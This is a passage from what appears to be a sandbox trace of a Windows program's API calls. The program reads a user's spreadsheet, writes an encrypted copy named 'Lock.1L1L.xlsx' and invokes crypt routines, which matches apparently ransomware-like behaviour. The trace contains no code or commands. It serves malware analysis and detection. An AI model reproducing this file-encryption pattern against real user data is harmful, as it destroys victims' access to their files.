Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0259.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/1L1L.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1l1l.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0259.424] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.424] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0259.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.425] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0259.425] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.425] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0259.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.425] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0259.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0259.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.453] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.1L1L.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.1l1l.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0259.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0259.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.456] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0259.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0259.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0259.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0259.462] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0259.462] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x4997, lpOverlapped=0x0) returned 1 [0259.465] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0259.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x3bf08b0 [0259.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0259.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x2f14010 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x3bf08b0 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0259.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0259.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0259.472] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0259.472] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0259.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x3bf08b0 [0259.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4997) returned 0x2f189b0 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.474] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.475] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.475] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.477] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.477] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.477] RtlAllocateHeap 